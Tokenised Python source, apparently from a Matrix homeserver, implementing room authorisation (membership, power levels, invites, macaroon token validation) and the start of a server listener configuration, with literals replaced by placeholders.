debug ( "<STR_LIT>" , event ) <EOL> except AuthError as e : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> event , e . msg <EOL> ) <EOL> logger . info ( "<STR_LIT>" , event ) <EOL> raise <EOL> def check_size_limits ( self , event ) : <EOL> def too_big ( field ) : <EOL> raise EventSizeError ( "<STR_LIT>" % ( field , ) ) <EOL> if len ( event . user_id ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT>" ) <EOL> if len ( event . room_id ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT>" ) <EOL> if event . is_state ( ) and len ( event . state_key ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT>" ) <EOL> if len ( event . type ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT:type>" ) <EOL> if len ( event . event_id ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT>" ) <EOL> if len ( encode_canonical_json ( event . get_pdu_json ( ) ) ) > <NUM_LIT> : <EOL> too_big ( "<STR_LIT>" ) <EOL> @ defer . inlineCallbacks <EOL> def check_joined_room ( self , room_id , user_id , current_state = None ) : <EOL> """<STR_LIT>""" <EOL> if current_state : <EOL> member = current_state . get ( <EOL> ( EventTypes . Member , user_id ) , <EOL> None <EOL> ) <EOL> else : <EOL> member = yield self . state . get_current_state ( <EOL> room_id = room_id , <EOL> event_type = EventTypes . Member , <EOL> state_key = user_id <EOL> ) <EOL> self . _check_joined_room ( member , user_id , room_id ) <EOL> defer . returnValue ( member ) <EOL> @ defer . inlineCallbacks <EOL> def check_user_was_in_room ( self , room_id , user_id ) : <EOL> """<STR_LIT>""" <EOL> member = yield self . state . get_current_state ( <EOL> room_id = room_id , <EOL> event_type = EventTypes . Member , <EOL> state_key = user_id <EOL> ) <EOL> membership = member . membership if member else None <EOL> if membership not in ( Membership . JOIN , Membership . LEAVE ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % ( <EOL> user_id , room_id <EOL> ) ) <EOL> if membership == Membership . LEAVE : <EOL> forgot = yield self . store . did_forget ( user_id , room_id ) <EOL> if forgot : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % ( <EOL> user_id , room_id <EOL> ) ) <EOL> defer . returnValue ( member ) <EOL> @ defer . inlineCallbacks <EOL> def check_host_in_room ( self , room_id , host ) : <EOL> curr_state = yield self . state . get_current_state ( room_id ) <EOL> for event in curr_state . values ( ) : <EOL> if event . type == EventTypes . Member : <EOL> try : <EOL> if UserID . from_string ( event . state_key ) . domain != host : <EOL> continue <EOL> except : <EOL> logger . warn ( "<STR_LIT>" , event . state_key ) <EOL> continue <EOL> if event . content [ "<STR_LIT>" ] == Membership . JOIN : <EOL> defer . returnValue ( True ) <EOL> defer . returnValue ( False ) <EOL> def check_event_sender_in_room ( self , event , auth_events ) : <EOL> key = ( EventTypes . Member , event . user_id , ) <EOL> member_event = auth_events . get ( key ) <EOL> return self . _check_joined_room ( <EOL> member_event , <EOL> event . user_id , <EOL> event . room_id <EOL> ) <EOL> def _check_joined_room ( self , member , user_id , room_id ) : <EOL> if not member or member . membership != Membership . JOIN : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % ( <EOL> user_id , room_id , repr ( member ) <EOL> ) ) <EOL> def can_federate ( self , event , auth_events ) : <EOL> creation_event = auth_events . get ( ( EventTypes . Create , "<STR_LIT>" ) ) <EOL> return creation_event . content . get ( "<STR_LIT>" , True ) is True <EOL> @ log_function <EOL> def is_membership_change_allowed ( self , event , auth_events ) : <EOL> membership = event . content [ "<STR_LIT>" ] <EOL> if len ( event . prev_events ) == <NUM_LIT:1> and Membership . JOIN == membership : <EOL> key = ( EventTypes . Create , "<STR_LIT>" , ) <EOL> create = auth_events . get ( key ) <EOL> if create and event . prev_events [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == create . event_id : <EOL> if create . content [ "<STR_LIT>" ] == event . state_key : <EOL> return True <EOL> target_user_id = event . state_key <EOL> creating_domain = RoomID . from_string ( event . room_id ) . domain <EOL> target_domain = UserID . from_string ( target_user_id ) . domain <EOL> if creating_domain != target_domain : <EOL> if not self . can_federate ( event , auth_events ) : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> key = ( EventTypes . Member , event . user_id , ) <EOL> caller = auth_events . get ( key ) <EOL> caller_in_room = caller and caller . membership == Membership . JOIN <EOL> caller_invited = caller and caller . membership == Membership . INVITE <EOL> key = ( EventTypes . Member , target_user_id , ) <EOL> target = auth_events . get ( key ) <EOL> target_in_room = target and target . membership == Membership . JOIN <EOL> target_banned = target and target . membership == Membership . BAN <EOL> key = ( EventTypes . JoinRules , "<STR_LIT>" , ) <EOL> join_rule_event = auth_events . get ( key ) <EOL> if join_rule_event : <EOL> join_rule = join_rule_event . content . get ( <EOL> "<STR_LIT>" , JoinRules . INVITE <EOL> ) <EOL> else : <EOL> join_rule = JoinRules . INVITE <EOL> user_level = self . _get_user_power_level ( event . user_id , auth_events ) <EOL> target_level = self . _get_user_power_level ( <EOL> target_user_id , auth_events <EOL> ) <EOL> ban_level = self . _get_named_level ( auth_events , "<STR_LIT>" , <NUM_LIT:50> ) <EOL> logger . debug ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : caller_in_room , <EOL> "<STR_LIT>" : caller_invited , <EOL> "<STR_LIT>" : target_banned , <EOL> "<STR_LIT>" : target_in_room , <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : join_rule , <EOL> "<STR_LIT>" : target_user_id , <EOL> "<STR_LIT>" : event . user_id , <EOL> } <EOL> ) <EOL> if Membership . INVITE == membership and "<STR_LIT>" in event . content : <EOL> if not self . _verify_third_party_invite ( event , auth_events ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> return True <EOL> if Membership . JOIN != membership : <EOL> if ( caller_invited <EOL> and Membership . LEAVE == membership <EOL> and target_user_id == event . user_id ) : <EOL> return True <EOL> if not caller_in_room : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" % ( event . user_id , event . room_id , ) <EOL> ) <EOL> if Membership . INVITE == membership : <EOL> if target_banned : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" % ( target_user_id , ) <EOL> ) <EOL> elif target_in_room : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % <EOL> target_user_id ) <EOL> else : <EOL> invite_level = self . _get_named_level ( auth_events , "<STR_LIT>" , <NUM_LIT:0> ) <EOL> if user_level < invite_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" % target_user_id <EOL> ) <EOL> elif Membership . JOIN == membership : <EOL> if event . user_id != target_user_id : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> elif target_banned : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> elif join_rule == JoinRules . PUBLIC : <EOL> pass <EOL> elif join_rule == JoinRules . INVITE : <EOL> if not caller_in_room and not caller_invited : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> else : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> elif Membership . LEAVE == membership : <EOL> if target_banned and user_level < ban_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" % ( target_user_id , ) <EOL> ) <EOL> elif target_user_id != event . user_id : <EOL> kick_level = self . _get_named_level ( auth_events , "<STR_LIT>" , <NUM_LIT:50> ) <EOL> if user_level < kick_level or user_level <= target_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" % target_user_id <EOL> ) <EOL> elif Membership . BAN == membership : <EOL> if user_level < ban_level or user_level <= target_level : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> else : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % membership ) <EOL> return True <EOL> def _verify_third_party_invite ( self , event , auth_events ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT>" not in event . content : <EOL> return False <EOL> if "<STR_LIT>" not in event . content [ "<STR_LIT>" ] : <EOL> return False <EOL> signed = event . content [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> for key in { "<STR_LIT>" , "<STR_LIT>" } : <EOL> if key not in signed : <EOL> return False <EOL> token = signed [ "<STR_LIT>" ] <EOL> invite_event = auth_events . get ( <EOL> ( EventTypes . ThirdPartyInvite , token , ) <EOL> ) <EOL> if not invite_event : <EOL> return False <EOL> if event . user_id != invite_event . user_id : <EOL> return False <EOL> if signed [ "<STR_LIT>" ] != event . state_key : <EOL> return False <EOL> if signed [ "<STR_LIT>" ] != token : <EOL> return False <EOL> for public_key_object in self . get_public_keys ( invite_event ) : <EOL> public_key = public_key_object [ "<STR_LIT>" ] <EOL> try : <EOL> for server , signature_block in signed [ "<STR_LIT>" ] . items ( ) : <EOL> for key_name , encoded_signature in signature_block . items ( ) : <EOL> if not key_name . startswith ( "<STR_LIT>" ) : <EOL> continue <EOL> verify_key = decode_verify_key_bytes ( <EOL> key_name , <EOL> decode_base64 ( public_key ) <EOL> ) <EOL> verify_signed_json ( signed , server , verify_key ) <EOL> return True <EOL> except ( KeyError , SignatureVerifyException , ) : <EOL> continue <EOL> return False <EOL> def get_public_keys ( self , invite_event ) : <EOL> public_keys = [ ] <EOL> if "<STR_LIT>" in invite_event . content : <EOL> o = { <EOL> "<STR_LIT>" : invite_event . content [ "<STR_LIT>" ] , <EOL> } <EOL> if "<STR_LIT>" in invite_event . content : <EOL> o [ "<STR_LIT>" ] = invite_event . content [ "<STR_LIT>" ] <EOL> public_keys . append ( o ) <EOL> public_keys . extend ( invite_event . content . get ( "<STR_LIT>" , [ ] ) ) <EOL> return public_keys <EOL> def _get_power_level_event ( self , auth_events ) : <EOL> key = ( EventTypes . PowerLevels , "<STR_LIT>" , ) <EOL> return auth_events . get ( key ) <EOL> def _get_user_power_level ( self , user_id , auth_events ) : <EOL> power_level_event = self . _get_power_level_event ( auth_events ) <EOL> if power_level_event : <EOL> level = power_level_event . content . get ( "<STR_LIT>" , { } ) . get ( user_id ) <EOL> if not level : <EOL> level = power_level_event . content . get ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> if level is None : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return int ( level ) <EOL> else : <EOL> key = ( EventTypes . Create , "<STR_LIT>" , ) <EOL> create_event = auth_events . get ( key ) <EOL> if ( create_event is not None and <EOL> create_event . content [ "<STR_LIT>" ] == user_id ) : <EOL> return <NUM_LIT:100> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _get_named_level ( self , auth_events , name , default ) : <EOL> power_level_event = self . _get_power_level_event ( auth_events ) <EOL> if not power_level_event : <EOL> return default <EOL> level = power_level_event . content . get ( name , None ) <EOL> if level is not None : <EOL> return int ( level ) <EOL> else : <EOL> return default <EOL> @ defer . inlineCallbacks <EOL> def get_user_by_req ( self , request , allow_guest = False ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> user_id = yield self . _get_appservice_user_id ( request . args ) <EOL> if user_id : <EOL> request . authenticated_entity = user_id <EOL> defer . returnValue ( <EOL> Requester ( UserID . from_string ( user_id ) , "<STR_LIT>" , False ) <EOL> ) <EOL> access_token = request . args [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> user_info = yield self . get_user_by_access_token ( access_token ) <EOL> user = user_info [ "<STR_LIT:user>" ] <EOL> token_id = user_info [ "<STR_LIT>" ] <EOL> is_guest = user_info [ "<STR_LIT>" ] <EOL> ip_addr = self . hs . get_ip_from_request ( request ) <EOL> user_agent = request . requestHeaders . getRawHeaders ( <EOL> "<STR_LIT>" , <EOL> default = [ "<STR_LIT>" ] <EOL> ) [ <NUM_LIT:0> ] <EOL> if user and access_token and ip_addr : <EOL> preserve_context_over_fn ( <EOL> self . store . insert_client_ip , <EOL> user = user , <EOL> access_token = access_token , <EOL> ip = ip_addr , <EOL> user_agent = user_agent <EOL> ) <EOL> if is_guest and not allow_guest : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" , errcode = Codes . GUEST_ACCESS_FORBIDDEN <EOL> ) <EOL> request . authenticated_entity = user . to_string ( ) <EOL> defer . returnValue ( Requester ( user , token_id , is_guest ) ) <EOL> except KeyError : <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . MISSING_TOKEN <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def _get_appservice_user_id ( self , request_args ) : <EOL> app_service = yield self . store . get_app_service_by_token ( <EOL> request_args [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> ) <EOL> if app_service is None : <EOL> defer . returnValue ( None ) <EOL> if "<STR_LIT>" not in request_args : <EOL> defer . returnValue ( app_service . sender ) <EOL> user_id = request_args [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> if app_service . sender == user_id : <EOL> defer . returnValue ( app_service . sender ) <EOL> if not app_service . is_interested_in_user ( user_id ) : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> if not ( yield self . store . get_user_by_id ( user_id ) ) : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> defer . returnValue ( user_id ) <EOL> @ defer . inlineCallbacks <EOL> def get_user_by_access_token ( self , token ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ret = yield self . get_user_from_macaroon ( token ) <EOL> except AuthError : <EOL> ret = yield self . _look_up_user_by_access_token ( token ) <EOL> defer . returnValue ( ret ) <EOL> @ defer . inlineCallbacks <EOL> def get_user_from_macaroon ( self , macaroon_str ) : <EOL> try : <EOL> macaroon = pymacaroons . Macaroon . deserialize ( macaroon_str ) <EOL> self . validate_macaroon ( macaroon , "<STR_LIT>" , False ) <EOL> user_prefix = "<STR_LIT>" <EOL> user = None <EOL> guest = False <EOL> for caveat in macaroon . caveats : <EOL> if caveat . caveat_id . startswith ( user_prefix ) : <EOL> user = UserID . from_string ( caveat . caveat_id [ len ( user_prefix ) : ] ) <EOL> elif caveat . caveat_id == "<STR_LIT>" : <EOL> guest = True <EOL> if user is None : <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> if guest : <EOL> ret = { <EOL> "<STR_LIT:user>" : user , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : None , <EOL> } <EOL> else : <EOL> ret = yield self . _look_up_user_by_access_token ( macaroon_str ) <EOL> if ret [ "<STR_LIT:user>" ] != user : <EOL> logger . error ( <EOL> "<STR_LIT>" , <EOL> user , <EOL> ret [ "<STR_LIT:user>" ] <EOL> ) <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , <EOL> "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> defer . returnValue ( ret ) <EOL> except ( pymacaroons . exceptions . MacaroonException , TypeError , ValueError ) : <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> def validate_macaroon ( self , macaroon , type_string , verify_expiry ) : <EOL> """<STR_LIT>""" <EOL> v = pymacaroons . Verifier ( ) <EOL> v . satisfy_exact ( "<STR_LIT>" ) <EOL> v . satisfy_exact ( "<STR_LIT>" + type_string ) <EOL> v . satisfy_general ( lambda c : c . startswith ( "<STR_LIT>" ) ) <EOL> v . satisfy_exact ( "<STR_LIT>" ) <EOL> if verify_expiry : <EOL> v . satisfy_general ( self . _verify_expiry ) <EOL> else : <EOL> v . satisfy_general ( lambda c : c . startswith ( "<STR_LIT>" ) ) <EOL> v . verify ( macaroon , self . hs . config . macaroon_secret_key ) <EOL> v = pymacaroons . Verifier ( ) <EOL> v . satisfy_general ( self . _verify_recognizes_caveats ) <EOL> v . verify ( macaroon , self . hs . config . macaroon_secret_key ) <EOL> def _verify_expiry ( self , caveat ) : <EOL> prefix = "<STR_LIT>" <EOL> if not caveat . startswith ( prefix ) : <EOL> return False <EOL> expiry = int ( caveat [ len ( prefix ) : ] ) <EOL> now = self . hs . get_clock ( ) . time_msec ( ) <EOL> return now < expiry <EOL> def _verify_recognizes_caveats ( self , caveat ) : <EOL> first_space = caveat . find ( "<STR_LIT:U+0020>" ) <EOL> if first_space < <NUM_LIT:0> : <EOL> return False <EOL> second_space = caveat . find ( "<STR_LIT:U+0020>" , first_space + <NUM_LIT:1> ) <EOL> if second_space < <NUM_LIT:0> : <EOL> return False <EOL> return caveat [ : second_space + <NUM_LIT:1> ] in self . _KNOWN_CAVEAT_PREFIXES <EOL> @ defer . inlineCallbacks <EOL> def _look_up_user_by_access_token ( self , token ) : <EOL> ret = yield self . store . get_user_by_access_token ( token ) <EOL> if not ret : <EOL> logger . warn ( "<STR_LIT>" % ( token , ) ) <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> user_info = { <EOL> "<STR_LIT:user>" : UserID . from_string ( ret . get ( "<STR_LIT:name>" ) ) , <EOL> "<STR_LIT>" : ret . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : False , <EOL> } <EOL> defer . returnValue ( user_info ) <EOL> @ defer . inlineCallbacks <EOL> def get_appservice_by_req ( self , request ) : <EOL> try : <EOL> token = request . args [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> service = yield self . store . get_app_service_by_token ( token ) <EOL> if not service : <EOL> logger . warn ( "<STR_LIT>" % ( token , ) ) <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , <EOL> "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> request . authenticated_entity = service . sender <EOL> defer . returnValue ( service ) <EOL> except KeyError : <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" <EOL> ) <EOL> def is_server_admin ( self , user ) : <EOL> return self . store . is_server_admin ( user ) <EOL> @ defer . inlineCallbacks <EOL> def add_auth_events ( self , builder , context ) : <EOL> auth_ids = self . compute_auth_events ( builder , context . current_state ) <EOL> auth_events_entries = yield self . store . add_event_hashes ( <EOL> auth_ids <EOL> ) <EOL> builder . auth_events = auth_events_entries <EOL> def compute_auth_events ( self , event , current_state ) : <EOL> if event . type == EventTypes . Create : <EOL> return [ ] <EOL> auth_ids = [ ] <EOL> key = ( EventTypes . PowerLevels , "<STR_LIT>" , ) <EOL> power_level_event = current_state . get ( key ) <EOL> if power_level_event : <EOL> auth_ids . append ( power_level_event . event_id ) <EOL> key = ( EventTypes . JoinRules , "<STR_LIT>" , ) <EOL> join_rule_event = current_state . get ( key ) <EOL> key = ( EventTypes . Member , event . user_id , ) <EOL> member_event = current_state . get ( key ) <EOL> key = ( EventTypes . Create , "<STR_LIT>" , ) <EOL> create_event = current_state . get ( key ) <EOL> if create_event : <EOL> auth_ids . append ( create_event . event_id ) <EOL> if join_rule_event : <EOL> join_rule = join_rule_event . content . get ( "<STR_LIT>" ) <EOL> is_public = join_rule == JoinRules . PUBLIC if join_rule else False <EOL> else : <EOL> is_public = False <EOL> if event . type == EventTypes . Member : <EOL> e_type = event . content [ "<STR_LIT>" ] <EOL> if e_type in [ Membership . JOIN , Membership . INVITE ] : <EOL> if join_rule_event : <EOL> auth_ids . append ( join_rule_event . event_id ) <EOL> if e_type == Membership . JOIN : <EOL> if member_event and not is_public : <EOL> auth_ids . append ( member_event . event_id ) <EOL> else : <EOL> if member_event : <EOL> auth_ids . append ( member_event . event_id ) <EOL> if e_type == Membership . INVITE : <EOL> if "<STR_LIT>" in event . content : <EOL> key = ( <EOL> EventTypes . ThirdPartyInvite , <EOL> event . content [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> ) <EOL> third_party_invite = current_state . get ( key ) <EOL> if third_party_invite : <EOL> auth_ids . append ( third_party_invite . event_id ) <EOL> elif member_event : <EOL> if member_event . content [ "<STR_LIT>" ] == Membership . JOIN : <EOL> auth_ids . append ( member_event . event_id ) <EOL> return auth_ids <EOL> def _get_send_level ( self , etype , state_key , auth_events ) : <EOL> key = ( EventTypes . PowerLevels , "<STR_LIT>" , ) <EOL> send_level_event = auth_events . get ( key ) <EOL> send_level = None <EOL> if send_level_event : <EOL> send_level = send_level_event . content . get ( "<STR_LIT>" , { } ) . get ( <EOL> etype <EOL> ) <EOL> if send_level is None : <EOL> if state_key is not None : <EOL> send_level = send_level_event . content . get ( <EOL> "<STR_LIT>" , <NUM_LIT:50> <EOL> ) <EOL> else : <EOL> send_level = send_level_event . content . get ( <EOL> "<STR_LIT>" , <NUM_LIT:0> <EOL> ) <EOL> if send_level : <EOL> send_level = int ( send_level ) <EOL> else : <EOL> send_level = <NUM_LIT:0> <EOL> return send_level <EOL> @ log_function <EOL> def _can_send_event ( self , event , auth_events ) : <EOL> send_level = self . _get_send_level ( <EOL> event . type , event . get ( "<STR_LIT>" , None ) , auth_events <EOL> ) <EOL> user_level = self . _get_user_power_level ( event . user_id , auth_events ) <EOL> if user_level < send_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" % ( user_level , send_level ) <EOL> ) <EOL> if hasattr ( event , "<STR_LIT>" ) : <EOL> if event . state_key . startswith ( "<STR_LIT:@>" ) : <EOL> if event . state_key != event . user_id : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> else : <EOL> sender_domain = UserID . from_string ( <EOL> event . user_id <EOL> ) . domain <EOL> if sender_domain != event . state_key : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> return True <EOL> def check_redaction ( self , event , auth_events ) : <EOL> """<STR_LIT>""" <EOL> user_level = self . _get_user_power_level ( event . user_id , auth_events ) <EOL> redact_level = self . _get_named_level ( auth_events , "<STR_LIT>" , <NUM_LIT:50> ) <EOL> if user_level >= redact_level : <EOL> return False <EOL> redacter_domain = EventID . from_string ( event . event_id ) . domain <EOL> redactee_domain = EventID . from_string ( event . redacts ) . domain <EOL> if redacter_domain == redactee_domain : <EOL> return True <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> def _check_power_levels ( self , event , auth_events ) : <EOL> user_list = event . content . get ( "<STR_LIT>" , { } ) <EOL> for k , v in user_list . items ( ) : <EOL> try : <EOL> UserID . from_string ( k ) <EOL> except : <EOL> raise SynapseError ( <NUM_LIT> , "<STR_LIT>" % ( k , ) ) <EOL> try : <EOL> int ( v ) <EOL> except : <EOL> raise SynapseError ( <NUM_LIT> , "<STR_LIT>" % ( v , ) ) <EOL> key = ( event . type , event . state_key , ) <EOL> current_state = auth_events . get ( key ) <EOL> if not current_state : <EOL> return <EOL> user_level = self . _get_user_power_level ( event . user_id , auth_events ) <EOL> levels_to_check = [ <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ] <EOL> old_list = current_state . content . get ( "<STR_LIT>" ) <EOL> for user in set ( old_list . keys ( ) + user_list . keys ( ) ) : <EOL> levels_to_check . append ( <EOL> ( user , "<STR_LIT>" ) <EOL> ) <EOL> old_list = current_state . content . get ( "<STR_LIT>" ) <EOL> new_list = event . content . get ( "<STR_LIT>" ) <EOL> for ev_id in set ( old_list . keys ( ) + new_list . keys ( ) ) : <EOL> levels_to_check . append ( <EOL> ( ev_id , "<STR_LIT>" ) <EOL> ) <EOL> old_state = current_state . content <EOL> new_state = event . content <EOL> for level_to_check , dir in levels_to_check : <EOL> old_loc = old_state <EOL> new_loc = new_state <EOL> if dir : <EOL> old_loc = old_loc . get ( dir , { } ) <EOL> new_loc = new_loc . get ( dir , { } ) <EOL> if level_to_check in old_loc : <EOL> old_level = int ( old_loc [ level_to_check ] ) <EOL> else : <EOL> old_level = None <EOL> if level_to_check in new_loc : <EOL> new_level = int ( new_loc [ level_to_check ] ) <EOL> else : <EOL> new_level = None <EOL> if new_level is not None and old_level is not None : <EOL> if new_level == old_level : <EOL> continue <EOL> if dir == "<STR_LIT>" and level_to_check != event . user_id : <EOL> if old_level == user_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> if old_level > user_level or new_level > user_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def check_can_change_room_list ( self , room_id , user ) : <EOL> """<STR_LIT>""" <EOL> is_admin = yield self . is_server_admin ( user ) <EOL> if is_admin : <EOL> defer . returnValue ( True ) <EOL> user_id = user . to_string ( ) <EOL> yield self . check_joined_room ( room_id , user_id ) <EOL> power_level_event = yield self . state . get_current_state ( <EOL> room_id , EventTypes . PowerLevels , "<STR_LIT>" <EOL> ) <EOL> auth_events = { } <EOL> if power_level_event : <EOL> auth_events [ ( EventTypes . PowerLevels , "<STR_LIT>" ) ] = power_level_event <EOL> send_level = self . _get_send_level ( <EOL> EventTypes . Aliases , "<STR_LIT>" , auth_events <EOL> ) <EOL> user_level = self . _get_user_power_level ( user_id , auth_events ) <EOL> if user_level < send_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) </s>
<s> from . _base import Config <EOL> class ServerConfig ( Config ) : <EOL> def read_config ( self , config ) : <EOL> self . server_name = config [ "<STR_LIT>" ] <EOL> self . pid_file = self . abspath ( config . get ( "<STR_LIT>" ) ) <EOL> self . web_client = config [ "<STR_LIT>" ] <EOL> self . web_client_location = config . get ( "<STR_LIT>" , None ) <EOL> self . soft_file_limit = config [ "<STR_LIT>" ] <EOL> self . daemonize = config . get ( "<STR_LIT>" ) <EOL> self . print_pidfile = config . get ( "<STR_LIT>" ) <EOL> self . user_agent_suffix = config . get ( "<STR_LIT>" ) <EOL> self . use_frozen_dicts = config . get ( "<STR_LIT>" , True ) <EOL> self . listeners = config . get ( "<STR_LIT>" , [ ] ) <EOL> bind_port = config . get ( "<STR_LIT>" ) <EOL> if bind_port : <EOL> self . listeners = [ ] <EOL> bind_host = config . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> gzip_responses = config . get ( "<STR_LIT>" , True ) <EOL> names = [ "<STR_LIT>" , "<STR_LIT>" ] if self . web_client else [ "<STR_LIT>" ] <EOL> self . listeners . append ( { <EOL> "<STR_LIT:port>" : bind_port , <EOL> "<STR_LIT>" : bind_host , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : names , <EOL> "<STR_LIT>" : gzip_responses , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : False , <EOL> } <EOL> ] <EOL> } ) <EOL> unsecure_port = config . get ( "<STR_LIT>" , bind_port - <NUM_LIT> ) <EOL> if unsecure_port : <EOL> self . listeners . append ( { <EOL> "<STR_LIT:port>" : unsecure_port , <EOL> "<STR_LIT>" : bind_host , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : names , <EOL> "<STR_LIT>" : gzip_responses , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : False , <EOL> } <EOL> ] <EOL> } ) <EOL> manhole = config . get ( "<STR_LIT>" ) <EOL> if manhole : <EOL> self . listeners . append ( { <EOL> "<STR_LIT:port>" : manhole , <EOL> "<STR_LIT>" : "<STR_LIT:127.0.0.1>" , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> } ) <EOL> metrics_port = config . get ( "<STR_LIT>" ) <EOL> if metrics_port : <EOL> self . listeners . append ( { <EOL> "<STR_LIT:port>" : metrics_port , <EOL> "<STR_LIT>" : config . get ( "<STR_LIT>" , "<STR_LIT:127.0.0.1>" ) , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : False , <EOL> } , <EOL> ] <EOL> } ) <EOL> content_addr = config . get ( "<STR_LIT>" ) <EOL> if not content_addr : <EOL> for listener in self . listeners : <EOL> if listener [ "<STR_LIT:type>" ] == "<STR_LIT:http>" and not listener . get ( "<STR_LIT>" , False ) : <EOL> unsecure_port = listener [ "<STR_LIT:port>" ] <EOL> break <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> host = self . server_name <EOL> if '<STR_LIT::>' not in host : <EOL> host = "<STR_LIT>" % ( host , unsecure_port ) <EOL> else : <EOL> host = host . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> host = "<STR_LIT>" % ( host , unsecure_port ) <EOL> content_addr = 